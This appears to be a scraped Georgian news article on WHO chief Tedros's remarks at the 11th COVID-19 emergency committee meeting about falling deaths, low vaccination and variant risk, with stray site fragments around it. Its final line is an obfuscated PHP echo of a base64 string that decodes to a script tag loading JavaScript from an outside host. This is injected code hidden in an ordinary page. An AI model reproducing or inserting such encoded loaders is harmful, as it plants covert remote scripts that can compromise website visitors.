celsiusi
ავერსი საქკაბელი
ჯანმრთელობის მსოფლიო ორგანიზაციის (WHO) გენერალურმა დირექტორმა, ტედროს ადჰანომ გებრეისუსმა COVID-19-ის საგანგებო კომიტეტის მე-11 შეხვედრაზე განაცხადა, რომ სასიამოვნოა სიკვდილიანობის კუთხით ახლა დაღმავალი ტენდენციის ხილვა, რომელიც გასულ კვირას, ორ წელზე მეტი ხნის განმავლობაში ყველაზე დაბალი იყო, მაგრამ პანდემია ჯერ კიდევ შორსა დასრულებისგან.
 
ჯანმო–ს დირექტორის განცხადებით, დიდ შეშფოთებას იწვევს ის ფაქტი, რომ ჯანდაცვის მუშაკების დიდი რაოდენობა და მაღალი რისკის ქვეშ მყოფი სხვა ადამიანები ჯერ კიდევ არ არიან აცრილები.
 
„ინფიცირება კვლავ ძალიან მაღალია, მაშინ როცა ვაქცინაცია საკმაოდ დაბალია ძალიან ბევრ ქვეყანაში. მრავალი საზოგადოებრივი ჯანდაცვისა და სოციალური ზომების შემსუბუქება საშუალებას იძლევა გაგრძელდეს ინფიცირების გადადება, რაც ახალი შტამების გაჩენის რისკს ქმნის“ , - აღნიშნა ჯანოს დირექტორმა.
 
691
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");